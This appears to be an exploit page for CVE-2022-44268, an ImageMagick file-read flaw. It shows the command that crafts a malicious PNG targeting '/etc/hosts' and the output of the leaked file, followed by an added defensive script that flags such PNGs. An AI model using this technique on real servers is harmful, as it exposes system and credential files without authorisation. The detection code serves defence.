## https://sploitus.com/exploit?id=F64ADDF1-A9D1-52B4-A5CB-9ACDDA5F648A
# CVE-2022-44268

**ImageMagick** is a free and open-source cross-platform software suite for displaying, converting, and editing raster image and vector image files. It can read and write over 200 image file formats. ImageMagick is licensed under the Apache License 2.0. It is available in the form of command-line tools, as well as a C API and a set of C++ classes. [Wikipedia](https://en.wikipedia.org/wiki/ImageMagick)

**ImageMagick** versions 7.1.0-40 and below are affected by a Local File Inclusion vulnerability caused by improper validation of user-supplied input. An attacker can exploit it by sending a crafted PNG file to the target. Successful exploitation could allow the attacker to read arbitrary files on the target system.

**Credit to the researchers who discovered this:**
- [Bryan Gonzalez and the Ocelot Team](https://www.metabaseq.com/imagemagick-zero-days/)

**Create a malicious PNG to take advantage of ImageMagick 7.1.0-40:**
- CVE-2022-44267: Denial of Service
- CVE-2022-44268: Information Disclosure


## Requirements
- Python3
- PIL (`pip install Pillow`)

## Usage
Crafting a PNG with **generate.py**:
```shell
python3 generate.py -i input.png -f "/etc/hosts" -o exploit.png

     
  ______     __  _____                   ______                
 |  _ \ \   / / |  __ \                 |  ____|               
 | |_) \ \_/ /  | |__) |__   __ _ ______| |__ _ __ ___   __ _  
 |  _ < \   /   |  ___/ _ \ / _` |______|  __| '__/ _ \ / _` | 
 | |_) | | |    | |  | (_) | (_| |      | |  | | | (_) | (_| | 
 |____/  |_|    |_|   \___/ \__, |      |_|  |_|  \___/ \__, | 
                             __/ |                       __/ | 
                            |___/                       |___/  

    

   [*] ImageMagick LFI Exploit
   [*] Embedding Payload to read the target file
   [*] Exploit PNG generated: exploit.png

```

## PoC
```shell
python3 extract.py downloaded_img.png
127.0.0.1       localhost
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

```
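
A defender-side check for the crafted upload described above, added here as an example and not part of the original repository: it walks the PNG chunk list and flags text chunks whose keyword is `profile`, the field through which affected ImageMagick versions take a file path. The function names and sample bytes are assumptions made for this example, and checking `zTXt`/`iTXt` in addition to `tEXt` is a conservative choice.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = (b"tEXt", b"zTXt", b"iTXt")


def iter_chunks(data):
    """Yield (type, payload) per chunk; raise ValueError on malformed input."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos < len(data):
        if pos + 12 > len(data):
            raise ValueError("truncated chunk header")
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype, end = data[pos + 4:pos + 8], pos + 8 + length
        if end + 4 > len(data):
            raise ValueError("truncated chunk body")
        yield ctype, data[pos + 8:end]
        if ctype == b"IEND":
            return
        pos = end + 4  # skip the 4-byte CRC


def find_profile_chunks(data):
    """Return [(chunk_type, raw_value)] for text chunks keyed 'profile'."""
    hits = []
    for ctype, payload in iter_chunks(data):
        keyword, sep, value = payload.partition(b"\x00")
        # Case-insensitive keyword match is a conservative assumption.
        if ctype in TEXT_CHUNKS and sep and keyword.lower() == b"profile":
            hits.append((ctype.decode("ascii"), value))
    return hits


def _chunk(ctype, payload):
    """Serialize one chunk: length, type, payload, CRC over type + payload."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


# Constructed samples: chunk skeletons without IDAT, enough for the scanner only.
_IHDR = _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
SAMPLE_CLEAN = PNG_SIG + _IHDR + _chunk(b"tEXt", b"Comment\x00holiday photo") + _chunk(b"IEND", b"")
SAMPLE_FLAGGED = PNG_SIG + _IHDR + _chunk(b"tEXt", b"profile\x00/etc/hosts") + _chunk(b"IEND", b"")

if __name__ == "__main__":
    for name, blob in (("clean", SAMPLE_CLEAN), ("flagged", SAMPLE_FLAGGED)):
        print(name, find_profile_chunks(blob))
```

Run it on uploads before they reach ImageMagick and reject or re-encode any file that returns hits; upgrading to a patched ImageMagick release is still required.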

*Disclaimer: Be a good boy plz don't use it for bad deeds*